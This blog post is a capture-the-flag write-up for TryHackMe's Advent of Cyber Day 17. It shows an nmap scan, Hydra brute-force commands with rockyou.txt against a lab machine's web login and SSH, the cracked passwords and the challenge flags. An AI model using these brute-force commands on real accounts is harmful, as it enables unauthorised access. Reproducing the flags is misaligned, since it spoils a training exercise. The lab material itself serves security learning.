Navigate back to the homepage

Advent of Cyber Day 17 Hydra-ha-ha-haa

Ludovic COULON
May 8th, 2020 · 1 min read

TryHackMe | Advent of Cyber

You suspect Elf Molly is communicating with the Christmas Monster. Compromise her accounts by brute forcing them!

Use Hydra to brute force Elf Molly’s password. Use the rockyou.txt password list, which can be found here.

Supporting materials can be found here.

This machine will take between 3-4 minutes to boot.

Setup

1nmap -A -vv 10.10.19.144
122/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
2| ssh-hostkey:
3|   2048 87:da:af:c1:ff:c5:03:11:54:80:41:d4:82:8a:99:d7 (RSA)
4| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHO4ktM9/27P2QGFraBKPJS3H+OXCHRWwn2XlNF47So47uW/XhvJOBdKpGSGfd5xsBLUerN7O3YCbwYmvggkas6D4GN0lrtyJacdk1wGViCBZwVd/j1lf3EVmRpO8ZMLOgEo9ew8hkG5P6S+P4xnW8FG7aEcRO6EF1Mq64r+GG2VK/wE6IwbPBs6ILG/SC4FGPy1rSNvDNRPgUouMeQqFjTXNEX0cWv8JFsfNogreS05wAOzjyne3d2Ow7RyvSm10zP9GWUXRYmkpspSSGruAZ8STLH8G0l3Z1kaQSNl5tqtMAhONnsuMh18MZCZxOpUfiD7cT20/ZEF8lD9eYSV/h
5|   256 2d:04:f7:b2:22:74:9a:32:a6:66:f8:50:0c:5c:c5:5a (ECDSA)
6| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHB+zsySVDiAxyh1OOC6IbA0FryCdBCXKOwBoqoLDkHC9+RA+8rwI4TVTrMuFsw77IKz67tgN56q8fO4BhVBMEU=
7|   256 87:2c:2e:a9:2c:28:a2:6c:b5:96:ff:58:cb:15:45:b6 (ED25519)
8|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW/CLFOcCBY09DHMT3eByXDXR1IysHYF2ecZVVf9PEt
9
1080/tcp open http syn-ack Node.js Express framework
11| http-methods:
12|_  Supported Methods: GET HEAD POST OPTIONS
13| http-title: Christmas Challenge
14|_Requested resource was /login
15Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
blog_image

Hydra - Brute Force HTTPs

1hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.19.144 http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:Your username or password is incorrect." -v
1[80][http-post-form] host: 10.10.19.144   login: "molly"   password: "joyness1994"

#1 Use Hydra to bruteforce molly’s web password. What is flag 1? (The flag is mistyped, its THM, not TMH)

blog_image
1"THM{2673a7dd116de68e85c48ec0b1f2612e}"

#2 Use Hydra to bruteforce molly’s SSH password. What is flag 2?

1kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.19.144
2
3Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
4
5Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-08 18:32:02
6[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
8[DATA] attacking ssh://10.10.19.144:22/
9
10[22][ssh] host: 10.10.19.144   login: "molly"   password: "butterfly"
111 of 1 target successfully completed, 1 valid password found
12[WARNING] Writing restore file because 2 final worker threads did not complete until end.
13[ERROR] 2 targets did not resolve or could not be connected
14[ERROR] 0 targets did not complete
15Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-08 18:32:10
1ssh molly@10.10.19.144
2password: "butterfly"
1molly@ip-10-10-19-144:~$ ls
2flag2.txt
3molly@ip-10-10-19-144:~$ cat flag2.txt
4"THM{c8eeb0468febbadea859baeb33b2541b}"

More articles from Ludovic COULON

Mr Robot CTF

Mr Robot CTF writeup

May 10th, 2020 · 1 min read

Advent of Cyber Challenge - TryHackMe

Advent of Cyber Challenge all the challengs solved write up

May 8th, 2020 · 1 min read
© 2020 Ludovic COULON
Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com
063664e4.js" async="">>"0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com